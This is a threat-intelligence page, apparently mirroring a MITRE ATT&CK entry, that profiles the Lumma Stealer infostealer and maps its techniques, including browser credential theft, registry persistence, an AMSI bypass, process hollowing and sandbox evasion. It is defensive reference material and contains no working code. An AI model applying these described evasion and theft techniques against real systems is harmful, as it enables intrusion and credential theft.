Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.

Lumma Stealer

Lumma Stealer is an information stealer malware family in use since at least 2022. Lumma Stealer is a Malware as a Service (MaaS) where captured data has been sold in criminal markets to Initial Access Brokers.(Citation: Cybereason LumaStealer Undated)(Citation: Netskope LummaStealer 2025)(Citation: Qualys LummaStealer 2024)(Citation: Fortinet LummaStealer 2024)(Citation: TrendMicro LummaStealer 2025)
ID: S1213
Associated Software: LummaStealer
Type: MALWARE
Platforms: Windows
Created: 22 Mar 2025
Last Modified: 22 Mar 2025

Associated Software Descriptions

Name Description
LummaStealer (Citation: Cybereason LumaStealer Undated)

Techniques Used

Domain ID Name Use
Enterprise T1071 .001 Application Layer Protocol: Web Protocols

Lumma Stealer has used HTTP and HTTP for command and control communication.(Citation: Qualys LummaStealer 2024)(Citation: Fortinet LummaStealer 2024)

Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Lumma Stealer has created registry keys to maintain persistence using `HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`.(Citation: Cybereason LumaStealer Undated)(Citation: Netskope LummaStealer 2025)

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

Lumma Stealer has used PowerShell for initial user execution and other fuctions.(Citation: Qualys LummaStealer 2024)(Citation: Cybereason LumaStealer Undated)(Citation: Netskope LummaStealer 2025)(Citation: Fortinet LummaStealer 2024)

.006 Command and Scripting Interpreter: Python

Lumma Stealer has used malicious Python scripts to execute payloads.(Citation: Cybereason LumaStealer Undated)

.010 Command and Scripting Interpreter: AutoHotKey & AutoIT

Lumma Stealer has utilized AutoIt malware scripts and AutoIt executables.(Citation: Qualys LummaStealer 2024)(Citation: Cybereason LumaStealer Undated)

Enterprise T1555 .003 Credentials from Password Stores: Credentials from Web Browsers

Lumma Stealer has gathered credential and other information from multiple browsers.(Citation: Cybereason LumaStealer Undated)(Citation: Fortinet LummaStealer 2024)(Citation: TrendMicro LummaStealer 2025)

Enterprise T1074 .001 Data Staged: Local Data Staging

Lumma Stealer has configured a custom user data directory such as a folder within `%USERPROFILE%\AppData\Roaming` for staging data.(Citation: TrendMicro LummaStealer 2025)

Enterprise T1573 .002 Encrypted Channel: Asymmetric Cryptography

Lumma Stealer has used HTTPS for command and control purposes.(Citation: Fortinet LummaStealer 2024)

Enterprise T1564 .003 Hide Artifacts: Hidden Window

Lumma Stealer has utilized the .NET `ProcessStartInfo` class features to prevent the process from creating a visible window through setting the `CreateNoWindow` setting to “True,” which allows the executed command or script to run without displaying a command prompt window.(Citation: Fortinet LummaStealer 2024)

Enterprise T1574 .001 Hijack Execution Flow: DLL

Lumma Stealer has leveraged legitimate applications to then side-load malicious DLLs during execution.(Citation: Cybereason LumaStealer Undated)

Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

Lumma Stealer has attempted to bypass Windows Antimalware Scan Interface (AMSI) by removing the string “AmsiScanBuffer” from the “clr.dll” module in memory to prevent it from being called.(Citation: Netskope LummaStealer 2025)

Enterprise T1036 .008 Masquerading: Masquerade File Type

Lumma Stealer has used payloads that resemble benign file extensions such as .mp3, .accdb, and .pub, though the files contained malicious JavaScript content.(Citation: Netskope LummaStealer 2025)

Enterprise T1027 .013 Obfuscated Files or Information: Encrypted/Encoded File

Lumma Stealer has used AES-encrypted payloads contained within PowerShell scripts.(Citation: Qualys LummaStealer 2024)

Enterprise T1566 .001 Phishing: Spearphishing Attachment

Lumma Stealer has been delivered through phishing emails with malicious attachments.(Citation: Cybereason LumaStealer Undated)

.002 Phishing: Spearphishing Link

Lumma Stealer has been delivered through phishing emails containing malicious links.(Citation: Cybereason LumaStealer Undated)

Enterprise T1055 .012 Process Injection: Process Hollowing

Lumma Stealer has used process hollowing leveraging a legitimate program such as “BitLockerToGo.exe” to inject a malicious payload.(Citation: Qualys LummaStealer 2024)

Enterprise T1518 .001 Software Discovery: Security Software Discovery

Lumma Stealer has detected antivirus processes using commands such as “tasklist” and “findstr.”(Citation: Qualys LummaStealer 2024)

Enterprise T1176 .001 Software Extensions: Browser Extensions

Lumma Stealer has installed a malicious browser extension to target Google Chrome, Microsoft Edge, Opera and Brave browsers for the purpose of stealing data.(Citation: Cybereason LumaStealer Undated)

Enterprise T1553 .002 Subvert Trust Controls: Code Signing

Lumma Stealer has used valid code signing digital certificates from ConsolHQ LTD and Verandah Green Limited to appear legitimate.(Citation: TrendMicro LummaStealer 2025)

Enterprise T1218 .005 System Binary Proxy Execution: Mshta

Lumma Stealer has used mshta.exe to execute additional content.(Citation: Qualys LummaStealer 2024)(Citation: Netskope LummaStealer 2025)

.015 System Binary Proxy Execution: Electron Applications

Lumma Stealer as leveraged Electron Applications to disable GPU sandboxing to avoid detection by security software.(Citation: TrendMicro LummaStealer 2025)

Enterprise T1204 .002 User Execution: Malicious File

Lumma Stealer has gained initial execution through victims opening malicious executable files embedded in zip archives, and MSI files within RAR files.(Citation: Cybereason LumaStealer Undated)

Enterprise T1497 .001 Virtualization/Sandbox Evasion: System Checks

Lumma Stealer has queried system resources on the victim device to identify if it is executing in a sandbox or virtualized environments, checking usernames, conducting WMI queries for system details, checking for files commonly found in virtualized environments, searching system services, and inspecting process names.(Citation: Fortinet LummaStealer 2024) Lumma Stealer has checked system GPU configurations for sandbox detection.(Citation: TrendMicro LummaStealer 2025)

Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.